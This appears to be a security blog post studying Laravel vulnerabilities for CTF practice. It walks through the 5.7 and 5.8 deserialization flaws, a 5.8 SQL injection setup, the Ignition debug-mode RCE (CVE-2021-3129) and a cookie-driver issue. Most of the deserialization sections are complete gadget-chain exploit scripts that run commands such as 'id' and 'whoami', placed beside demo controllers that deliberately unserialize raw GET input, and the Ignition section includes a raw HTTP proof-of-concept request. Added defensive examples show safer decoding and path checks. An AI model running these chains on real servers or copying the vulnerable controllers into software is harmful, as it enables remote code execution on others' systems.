Laravel Vulnerability Study

admin, 2022-01-06 01:44:46, Security Blog, CTF section

Installation

composer create-project laravel/laravel laravel57 "5.7.*"

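Laravel 5.7 deserialization vulnerability

For details, see these articles:
https://xz.aliyun.com/t/5911
https://www.cnblogs.com/tr1ple/p/11079354.html

Vulnerability description:

Laravel Framework is a PHP web application framework developed by Taylor Otwell. Illuminate is one of its components. The Illuminate component in Laravel Framework 5.7.x has a deserialization vulnerability that a remote attacker can use to execute code.

Assume the following vulnerable entry point exists in application code built on the framework:
Add a DemoController controller under laravel57/app/Http/Controllers/ with the following code: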

<?php
namespace App\Http\Controllers;

use Illuminate\Http\Request;

class DemoController extends Controller
{
    public function demo()
    {
        if (isset($_GET['c'])) {
            $code = $_GET['c'];
            unserialize($code);
        } else {
            highlight_file(__FILE__);
        }
        return "Welcome to laravel5.7";
    }
}

Add a route in laravel57/routes/web.php so that the controller can be reached later:

Route::get('/', "DemoController@demo");

exp

Run it from the public folder:

<?php

namespace Illuminate\Foundation\Testing{
    class PendingCommand{
        protected $command;
        protected $parameters;
        protected $app;
        public $test;

        public function __construct($command, $parameters,$class,$app){
            $this->command = $command;
            $this->parameters = $parameters;
            $this->test=$class;
            $this->app=$app;
        }
    }
}

namespace Illuminate\Auth{
    class GenericUser{
        protected $attributes;
        public function __construct(array $attributes){
            $this->attributes = $attributes;
        }
    }
}

namespace Illuminate\Foundation{
    class Application{
        protected $hasBeenBootstrapped = false;
        protected $bindings;

        public function __construct($bind){
            $this->bindings=$bind;
        }
    }
}

namespace{
    $genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));
    $application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")));
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand("system",array('id'),$genericuser,$application);
    echo urlencode(serialize($pendingcommand));
}

?>

Laravel 5.8.x deserialization POP chains

exp1:
For details, see https://xz.aliyun.com/t/6059

Add a route in laravel58/routes/web.php:

Route::get("/", "\App\Http\Controllers\DemoController@demo");

Add a DemoController.php controller under laravel58/app/Http/Controllers/:

<?php
namespace App\Http\Controllers;

class DemoController extends Controller
{
    public function demo()
    {
        if (isset($_GET['c'])) {
            $code = $_GET['c'];
            unserialize($code);
        } else {
            highlight_file(__FILE__);
        }
        return "Welcome to laravel5.8";
    }
}

exp1

<?php
namespace PhpParser\Node\Scalar\MagicConst{
    class Line {}
}
namespace Mockery\Generator{
    class MockDefinition
    {
        protected $config;
        protected $code;

        public function __construct($config, $code)
        {
            $this->config = $config;
            $this->code = $code;
        }
    }
}
namespace Mockery\Loader{
    class EvalLoader{}
}
namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver;
        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}
namespace Illuminate\Foundation\Console{
    class QueuedCommand
    {
        public $connection;
        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}
namespace Illuminate\Broadcasting{
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($events, $event)
        {
            $this->events = $events;
            $this->event = $event;
        }
    }
}
namespace{
    $line = new PhpParser\Node\Scalar\MagicConst\Line();
    $mockdefinition = new Mockery\Generator\MockDefinition($line,'<?php phpinfo();?>');
    $evalloader = new Mockery\Loader\EvalLoader();
    $dispatcher = new Illuminate\Bus\Dispatcher(array($evalloader,'load'));
    $queuedcommand = new Illuminate\Foundation\Console\QueuedCommand($mockdefinition);
    $pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher,$queuedcommand);
    echo urlencode(serialize($pendingbroadcast));
}
?>

exp2:
This chain comes from a challenge in a recent national CTF competition. The vulnerability is in the symfony component (affecting versions up to the latest 4.4.x-dev), which the default laravel5.8 installation does not include. To reproduce it, add "symfony/symfony": "4.*" to require in composer.json and run composer update.

<?php
namespace Symfony\Component\Cache{
    final class CacheItem
    {
        protected $expiry;
        protected $poolHash;
        protected $innerItem;
        public function __construct($expiry, $poolHash, $command)
        {
            $this->expiry = $expiry;
            $this->poolHash = $poolHash;
            $this->innerItem = $command;
        }
    }
}
namespace Symfony\Component\Cache\Adapter{
    class ProxyAdapter
    {
        private $poolHash;
        private $setInnerItem;
        public function __construct($poolHash, $func)
        {
            $this->poolHash = $poolHash;
            $this->setInnerItem = $func;
        }
    }
    class TagAwareAdapter
    {
        private $deferred = [];
        private $pool;
        public function __construct($deferred, $pool)
        {
            $this->deferred = $deferred;
            $this->pool = $pool;
        }
    }
}
namespace {
    $cacheitem = new Symfony\Component\Cache\CacheItem(1,1,"whoami");
    $proxyadapter = new Symfony\Component\Cache\Adapter\ProxyAdapter(1,'system');
    $tagawareadapter = new Symfony\Component\Cache\Adapter\TagAwareAdapter(array($cacheitem),$proxyadapter);
    echo urlencode(serialize($tagawareadapter));
}
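
The hardened counterpart of the two DemoController actions above (5.7 and 5.8), as an added example that is not part of the original post or of Laravel: the input is decoded with allowed_classes disabled and anything that still contains an object is rejected, so no class from the POP chains is ever instantiated. Probe, containsObject() and decodeUntrusted() are hypothetical names, and the inputs are constructed samples.

```php
<?php
// Added example, not from the original post or from Laravel.
// Probe is a hypothetical stand-in for a gadget class: its destructor has a side effect.
class Probe
{
    public static $fired = 0;
    public function __destruct()
    {
        self::$fired++;
    }
}

// True if $value holds an object anywhere, including the __PHP_Incomplete_Class
// placeholders (is_object() reports false for those before PHP 7.2).
function containsObject($value): bool
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    foreach (is_array($value) ? $value : [] as $item) {
        if (containsObject($item)) {
            return true;
        }
    }
    return false;
}

// Decode untrusted input to scalars and arrays only, never to class instances.
function decodeUntrusted(string $raw)
{
    // allowed_classes => false maps every serialized object to
    // __PHP_Incomplete_Class, so no magic method of a real class is invoked.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if ($value === false && $raw !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (containsObject($value)) {
        throw new InvalidArgumentException('serialized objects are not accepted');
    }
    return $value;
}

// Constructed sample inputs: one serialized object, one plain array.
foreach (['O:5:"Probe":0:{}', serialize(['page' => 2, 'tags' => ['a', 'b']])] as $raw) {
    try {
        var_dump(decodeUntrusted($raw));
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
echo 'Probe destructor calls: ', Probe::$fired, "\n";
```

Where the parameter only needs to carry data, json_decode() avoids PHP serialization entirely.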

Laravel 5.8 SQL injection vulnerability

Versions below Laravel 5.8.5
https://xz.aliyun.com/t/5331

Add to the database:

create table users(
    id int auto_increment,
    username varchar(250),
    password varchar(250),
    level int,
    primary key(id)
);
insert into users values(1,'admin','admin',1);
insert into users values(2,'user','123456',2);
insert into users values(3,'aaa','bbb',3);

Laravel <= 8.4.2 Debug mode _ignition remote code execution vulnerability

Detailed write-up: https://whoamianony.top/2021/01/15/lou-dong-fu-xian/laravel/laravel-debug-mode-rce-cve-2021-3129-li-yong-fu-xian/

When Laravel has Debug mode enabled, some endpoints of the bundled Ignition feature filter their input insufficiently. An attacker can send malicious requests and trigger Phar deserialization, for example by crafting a malicious log file, which leads to remote code execution and control of the server.

git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
mv .env.example .env    # rename .env.example to .env
php artisan key:generate
php artisan serve --host=0.0.0.0

poc

POST /_ignition/execute-solution HTTP/1.1
Host: localhost:8000
Content-Type: application/json
Content-Length: 168

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "xxxxxxx"//location of the phar file
  }
}
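
The kind of filtering the viewFile parameter needs, as an added example that is not Ignition's own code and not part of the original post: it rejects stream-wrapper prefixes, non-Blade files, and paths that resolve outside the view directory. isSafeViewFile() and $viewRoot are hypothetical names, the sample paths are constructed, and it assumes views are Blade templates under a single root.

```php
<?php
// Added example, not Ignition's own code. isSafeViewFile() and $viewRoot are
// hypothetical names for a check on the "viewFile" request parameter.
function isSafeViewFile(string $viewFile, string $viewRoot): bool
{
    // A "scheme://" prefix such as phar:// selects a PHP stream wrapper, not a plain file.
    if (strpos($viewFile, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*://#i', $viewFile)) {
        return false;
    }
    // Assumption: only Blade templates are legitimate targets for this solution.
    if (substr($viewFile, -10) !== '.blade.php') {
        return false;
    }
    // Resolve symlinks and ".." and require the result to stay under the view root.
    $real = realpath($viewFile);
    $root = realpath($viewRoot);
    if ($real === false || $root === false) {
        return false;
    }
    return strpos($real, $root . DIRECTORY_SEPARATOR) === 0;
}

// Constructed sample: a temporary view root holding one Blade file.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'views_' . getmypid();
mkdir($root);
file_put_contents($root . '/welcome.blade.php', '{{ $username }}');

$candidates = [
    $root . '/welcome.blade.php',              // plain path inside the view root
    'phar://' . $root . '/welcome.blade.php',  // stream wrapper prefix
    $root . '/../laravel.log',                 // non-Blade file outside the view root
];
foreach ($candidates as $path) {
    echo isSafeViewFile($path, $root) ? 'allow ' : 'deny  ', $path, "\n";
}

unlink($root . '/welcome.blade.php');
rmdir($root);
```

With APP_DEBUG=false in .env, the precondition the description names (Debug mode enabled) no longer holds, so a check like this is a second layer and not the primary control.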

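Laravel cookie

Laravel released security updates stating that applications using the cookie session driver are affected by a vulnerability that can lead to RCE.
https://blog.laravel.com/laravel-cookie-security-releases
http://x2y.pw/2020/08/06/Laravel-Cookie-Security%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
Affected versions: < v6.18.27, < v7.22.0

The vulnerability is of limited practical use because it has many preconditions:

  • The cookie session driver must be enabled; the default is the file driver
  • The developer must have written specific vulnerable code, cookie('key', $value), where the value is fully controllable
  • A deserialization call chain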

References

Laravel 5.7 deserialization vulnerability: RCE chain discovery
Laravel 5.8.x deserialization POP chains

FROM: blog.cfyqy.com | Author: cfyqy
